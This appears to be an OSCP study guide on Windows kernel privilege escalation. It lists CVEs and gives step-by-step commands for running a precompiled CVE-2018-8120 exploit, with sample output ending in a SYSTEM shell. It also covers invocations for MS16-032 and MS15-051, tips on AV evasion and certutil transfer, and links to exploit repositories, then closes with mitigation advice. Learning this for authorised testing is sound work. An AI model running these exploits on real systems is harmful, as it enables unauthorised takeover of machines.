Kernel Exploits

Kernel exploits are powerful privilege escalation vectors that target vulnerabilities in the Windows kernel or kernel-mode drivers. Successfully exploiting these vulnerabilities often results in SYSTEM-level privileges.

Understanding Kernel Exploits

What Are Kernel Exploits?

Kernel exploits target vulnerabilities in the Windows kernel or kernel-mode drivers. These typically involve:

• Memory corruption vulnerabilities

• Type confusion issues

• Use-after-free bugs

• Improper input validation

• Race conditions

Why Are They Effective?

• The kernel runs with the highest privileges (Ring 0)

• Successful exploitation often grants SYSTEM privileges directly

• They can bypass many security mechanisms

Limitations and Risks

• Kernel exploits can be unstable and may crash the system

• They are often patched quickly by Microsoft

• Modern Windows systems have mitigations like KASLR (Kernel Address Space Layout Randomization) and KPP (Kernel Patch Protection)

• Failed exploitation attempts often result in a Blue Screen of Death (BSOD)

Common Windows Kernel Exploits

CVE	Affected Systems	Description
CVE-2018-8120	Windows 7, Windows Server 2008	Win32k elevation of privilege vulnerability
CVE-2019-0803	Windows 7 to Windows 10	Win32k elevation of privilege vulnerability
CVE-2019-1215	Windows 7 to Windows 10	ws2ifsl.sys use-after-free
CVE-2020-0787	Windows 7 to Windows 10	Windows Background Intelligent Transfer Service (BITS)
CVE-2021-1732	Windows 10	Win32k elevation of privilege vulnerability
MS16-032	Windows 7 to Windows 10	Secondary Logon Handle privilege escalation
MS15-051	Windows 7 to Windows 8.1	Win32k elevation of privilege

Example: Exploiting CVE-2018-8120

CVE-2018-8120 is a vulnerability in the Win32k component that affects Windows 7 SP1 and Windows Server 2008 R2 SP1. This is a good example for OSCP practice as it's reliable and affects systems you might encounter during the exam.

Vulnerability Details

• The vulnerability exists in the way the Win32k component handles objects in memory

• Specifically, it's a NULL pointer dereference in the NtUserSetImeInfoEx() system call

• It affects systems that haven't been patched as of May 2018

Pre-Requisites

• Windows 7 SP1 x64 or x86 (or Windows Server 2008 R2 SP1)

• Missing the May 2018 security updates (KB4103718)

Exploitation Steps

1. Identify a vulnerable system:

   systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

2. Check for the patch:

   wmic qfe | find "KB4103718"

   If no results are returned, the system is likely vulnerable.

3. Transfer the exploit to the target: The compiled exploit can be found at various locations, including:

   • https://github.com/bigric3/cve-2018-8120

4. Execute the exploit:

   cve-2018-8120.exe

Expected Results

Upon successful exploitation, you'll see a new command prompt with SYSTEM privileges:

[*] CVE-2018-8120 exploitation by @bigric3
[*] Exploit for Windows 7 SP1 / 2008 R2 SP1
[+] GDI object allocated
[+] GDI object freed
[+] Pool fengshui...
[+] nt!HaliQuerySystemInformation pointer leaked: 0xFFFFF8800F4FD8A0
[+] nt!_KPROCESS UniqueProcessId offset: 0x180
[+] nt!_KPROCESS Token offset: 0x208
[+] nt!_KPROCESS ActiveProcessLinks offset: 0x188
[+] Current process: 0xFFFFF8800F228780
[+] System process: 0xFFFFF8800F241340
[+] Stealing System token...
[+] Token stealing completed successfully!
[+] Enjoy SYSTEM shell ;)

C:\>whoami
nt authority\system

Determining if a System is Vulnerable

To identify potential kernel vulnerabilities:

1. Get system information:

   systeminfo

2. Check for installed patches:

   wmic qfe list brief

3. Use Windows Exploit Suggester: On your attack machine:

   # Get systeminfo from target
   # Then run:
   python wes.py systeminfo.txt

Finding and Using Kernel Exploits

Essential Tools for Finding Kernel Exploits

Windows Exploit Suggester (WES-NG)

WES-NG is a powerful tool that analyzes Windows systeminfo output and suggests potential exploits:

• Repository: https://github.com/bitsadmin/wesng

• Usage:

  # Update the database
  python3 wes.py --update
  
  # Analyze systeminfo output
  python3 wes.py systeminfo.txt
  
  # Filter for kernel exploits only
  python3 wes.py systeminfo.txt --exploits-only

Precompiled Kernel Exploits Collection

A comprehensive collection of Windows kernel exploits with precompiled binaries:

• Repository: https://github.com/SecWiki/windows-kernel-exploits

• Benefits:

  • Organized by CVE/MS number

  • Includes both 32-bit and 64-bit versions

  • Contains documentation for each exploit

  • Regularly updated with new exploits

Watson

Watson is a .NET tool designed to enumerate missing KBs and suggest exploits:

• Repository: https://github.com/rasta-mouse/Watson

• Usage:

  # Run on the target Windows system
  Watson.exe

• Advantages:

  • Runs directly on the target system

  • Doesn't require transferring systeminfo output

  • Specifically focused on privilege escalation vulnerabilities

  • Ideal for OSCP scenarios where you have limited user access

Where to Find Kernel Exploits

• ExploitDB/Searchsploit:

  searchsploit windows kernel local

• GitHub repositories:

  • https://github.com/SecWiki/windows-kernel-exploits

  • https://github.com/abatchy17/WindowsExploits

• Precompiled exploits on Kali: /usr/share/exploitdb/exploits/windows/local/

Preparing Exploits for Use

Most kernel exploits need to be compiled or modified before use:

1. For precompiled binaries:

   • Check architecture (x86 vs x64)

   • Use AV evasion techniques if needed

   • Transfer to target using methods like certutil.exe or SMB

2. For source code:

   • Compile using appropriate tools (Visual Studio for .c/.cpp files)

   • Ensure correct architecture

   • Strip debugging information to reduce size

Testing Kernel Exploits Safely

Given the unstable nature of kernel exploits:

1. Take a snapshot/backup if in a VM environment

2. Save any important work before running exploits

3. Test in a controlled environment first

4. Be prepared for system crashes

Other Common Kernel Exploit Examples

MS16-032

Affects Windows 7-10 and Server 2008-2012 R2. Exploits a vulnerability in the Secondary Logon service.

# PowerShell implementation
powershell -exec bypass -command "& {Import-Module .\MS16-032.ps1; Invoke-MS16-032}"

MS15-051

Affects Windows 7-8.1 and Server 2008-2012 R2. Exploits a vulnerability in the Win32k subsystem.

ms15-051.exe "command to run as SYSTEM"

OSCP Notes

For the OSCP exam:

1. Prioritize stable exploits like CVE-2018-8120 for Windows 7

2. Test exploits thoroughly in lab environments

3. Have multiple kernel exploits prepared for different Windows versions

4. Be ready with a recovery plan if the exploit crashes the system

5. Focus on unpatched legacy systems (Windows 7, Windows Server 2008 R2)

6. Check target architecture carefully to use the correct exploit version

7. Download and organize key exploits before the exam - have them ready in your toolkit

Mitigation and Prevention

To protect systems from kernel exploits:

1. Keep systems updated with the latest security patches

2. Enable Credential Guard and Device Guard on supported systems

3. Use EMET or Windows Defender Exploit Guard for additional protection

4. Implement principle of least privilege - avoid running as administrator

5. Use application whitelisting to prevent execution of unauthorized exploits